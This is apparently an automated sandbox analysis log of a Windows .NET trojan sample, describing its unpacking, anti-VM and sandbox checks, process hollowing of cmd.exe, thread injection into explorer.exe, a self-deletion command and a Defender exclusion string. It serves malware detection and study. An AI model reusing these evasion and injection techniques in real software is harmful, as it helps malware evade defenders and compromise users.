          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Fp4grWelSC.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fp4grWelSC.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@0/0
          Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011FA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,11_2_011FA0D2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,11_2_011DC5CA
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_01
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Fp4grWelSC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Fp4grWelSC.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Fp4grWelSC.exe, 00000004.00000002.764180454.00000000014F0000.00000040.00000001.sdmp, Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942277980.0000000003230000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942585836.000000000334F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Fp4grWelSC.exe, 00000004.00000002.766071483.00000000035D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000000.763461139.00000000011D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Fp4grWelSC.exe, 00000004.00000002.764180454.00000000014F0000.00000040.00000001.sdmp, Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942277980.0000000003230000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942585836.000000000334F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdb source: Fp4grWelSC.exe, 00000004.00000002.766071483.00000000035D0000.00000040.00020000.sdmp, cmd.exe, cmd.exe, 0000000B.00000000.763461139.00000000011D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: Fp4grWelSC.exe, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Fp4grWelSC.exe.370000.0.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Fp4grWelSC.exe.370000.0.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.7.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.9.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.5.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.1.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Fp4grWelSC.exe.ab0000.1.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.2.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.3.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.0.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 0_2_0037F6EB push esp; iretd 0_2_0037F6EE
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041B822 push eax; ret 4_2_0041B828
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041B82B push eax; ret 4_2_0041B892
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041B88C push eax; ret 4_2_0041B892
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00418AC3 push esp; iretd 4_2_00418ACC
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041747D push edi; ret 4_2_0041747E
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041CD7E push es; ret 4_2_0041CD87
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0040CD0A push es; iretd 4_2_0040CD0B
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041A5E6 push ebp; ret 4_2_0041A5E7
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041B7D5 push eax; ret 4_2_0041B828
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00ABF6EB push esp; iretd 4_2_00ABF6EE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E76BD push ecx; ret 11_2_011E76D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E76D1 push ecx; ret 11_2_011E76E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.74639201184

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cmd.exe Process created: /c del "C:\Users\user\Desktop\Fp4grWelSC.exe"
          Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 0.2.Fp4grWelSC.exe.28777e4.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Fp4grWelSC.exe.286f7d8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Fp4grWelSC.exe.28b65dc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000000.00000002.689155208.000000000288A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Fp4grWelSC.exe PID: 7132, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Fp4grWelSC.exe, 00000000.00000002.689155208.000000000288A000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: Fp4grWelSC.exe, 00000000.00000002.689155208.000000000288A000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 0000000000608604 second address: 000000000060860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 000000000060899E second address: 00000000006089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe TID: 7136 Thread sleep time: -34160s >= -30000s
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe TID: 7160 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Code function: 4_2_004088D0 rdtsc 4_2_004088D0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011F31DC FindFirstFileW,FindNextFileW,FindClose,11_2_011F31DC
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_011D85EA
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,11_2_011E245C
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,11_2_011DB89C
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,11_2_011E68BA
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Thread delayed: delay time: 34160
          Source: Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011F2258 IsDebuggerPresent,11_2_011F2258
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011F1914 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,11_2_011F1914
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Code function: 4_2_004088D0 rdtsc 4_2_004088D0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011FB5E0 mov eax, dword ptr fs:[00000030h] 11_2_011FB5E0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Code function: 4_2_00409B40 LdrLoadDll,4_2_00409B40
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Memory allocated: page read and write | page guard
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011E7310 SetUnhandledExceptionFilter,11_2_011E7310
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011E6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_011E6FE3

          HIPS / PFW / Operating System Protection Evasion:

          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 11D0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: unknown protection: read write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Memory written: C:\Users\user\Desktop\Fp4grWelSC.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Process created: C:\Users\user\Desktop\Fp4grWelSC.exe C:\Users\user\Desktop\Fp4grWelSC.exe
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Fp4grWelSC.exe"
          Source: cmd.exe, 0000000B.00000002.943871101.0000000005650000.00000002.00020000.sdmp Binary or memory string: ,Program Manager
          Source: explorer.exe, 00000005.00000000.689548648.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.709918766.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.724562670.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.689743378.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710216019.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.724853374.0000000001080000.00000002.00020000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.699520641.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.689743378.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710216019.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.724853374.0000000001080000.00000002.00020000.sdmp, cmd.exe, 0000000B.00000002.943871101.0000000005650000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.874340943.0000000004E40000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.689743378.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710216019.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.724853374.0000000001080000.00000002.00020000.sdmp, cmd.exe, 0000000B.00000002.943871101.0000000005650000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.874340943.0000000004E40000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.841376064.0000000004A69000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.842632526.0000000004A69000.00000004.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000016.00000000.853795792.0000000000B28000.00000004.00000020.sdmp Binary or memory string: ProgmansT
          Source: explorer.exe, 00000016.00000003.841476449.0000000004A2F000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.873737852.0000000004A35000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd(%
          Source: explorer.exe, 00000005.00000000.689743378.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710216019.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.724853374.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.702175441.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.732418919.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.716929271.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Queries volume information: C:\Users\user\Desktop\Fp4grWelSC.exe VolumeInformation
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
